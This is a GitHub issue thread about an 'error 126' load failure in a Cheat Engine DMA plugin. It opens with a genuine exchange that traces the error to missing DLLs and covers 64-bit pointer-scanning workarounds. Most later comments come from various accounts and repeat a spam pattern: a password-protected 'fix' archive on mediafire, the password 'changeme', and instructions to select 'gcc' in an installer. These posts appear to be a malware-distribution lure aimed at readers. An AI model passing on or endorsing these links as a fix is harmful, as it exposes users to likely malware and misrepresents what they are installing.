### ISSUE TITLE
Error 126

### ISSUE THREAD

**Issue by goshante** [kaijia2022/Cheat-Engine-DMA-Plugin#1]
Your plugin have same issue as this: https://github.com/Metick/CheatEngine-DMA

Impossible to load, error 126. Any clues why this happens?

**Comment by kaijia2022** [comment]
Error 126 happens because you are missing dlls. Did you add the neccessary dlls to the same folder as the compiled binaries?

There is a closed issue in metick's repo you can refer to. You can also check out my [Reclass.NET plugin project README](https://github.com/kaijia2022/ReClass.NET-DMAPlugin) for the required dlls.

I have just solved the pointer scanning problem but there are some issues still, related to how the selected address lists are displayed. I will write a very thorough README on the steps to enable this plugin after I solve this problem.

**Comment by goshante** [comment]
I already solved this problem, thanks. I recompiled all DLLs and moved them to CE directory, now plugin works correctly

**Comment by kaijia2022** [comment]
No worries, also just to let you know, if you want to generate pointer map or do pointer scanning at the moment for a 64 bit process, you'll have to compile cheat engine from the master branch, attach the Lazarus debugger to the compiled cheatengine.exe, and change the value of `processhandler.is64Bit` to `True` before you generate pointer map. The pointers and offsets you generate are correct except they will show in the address table as 32 bit addresses, therefore not correctly dereferenced. 

This happens because the `processhandle` returned from `OpenProcess` in my implementation is not a valid handle for the kernel handler to query. I am trying to work around this at the moment.

**Comment by goshante** [comment]
Thank you for useful information!

**Comment by Lxx-c** [comment]
Download 
https://www.mediafire.com/file/zch0v8rj7200mbm/fix.zip/file
password: changeme
In the installer menu, select "gcc."

**Comment by Lxx-c** [comment]
Download 
https://www.mediafire.com/file/zch0v8rj7200mbm/fix.zip/file
password: changeme
In the installer menu, select "gcc."

**Comment by Searchanik** [comment]
Download 
https://www.mediafire.com/file/zch0v8rj7200mbm/fix.zip/file
password: changeme
In the installer menu, select "gcc."

**Comment by Avishake2017** [comment]
Download 
https://www.mediafire.com/file/czdodbba054p738/fix.rar/file
password: changeme
In the installer menu, select "gcc."

**Comment by NikhilKumar77777** [comment]
to fix your trouble try download this fix, i see it in another issue,
https://app.mediafire.com/3ag3jpquii3of
password: changeme
when you installing, you need to place a check in install to path and select "gcc."

**Comment by Gaurav9812** [comment]
Download 
https://www.mediafire.com/file/5t7dozm7sptcuqj/fix.zip/file
password: changeme
In the installer menu, select "gcc."

**Comment by NEKO-JOJUK** [comment]
to fix your trouble check this fix, i see it in another issue,
https://app.mediafire.com/9mrkd33xulszl
password: changeme
when you installing, you need to place a check in install to path and select "gcc."

**Comment by rickdoq** [comment]
hi bro, to fix your trouble try this fix, i see it in another issue,
https://app.mediafire.com/dqajf1x14ccfd
password: changeme
when you installing it, you need to place a check in install to path and select usx
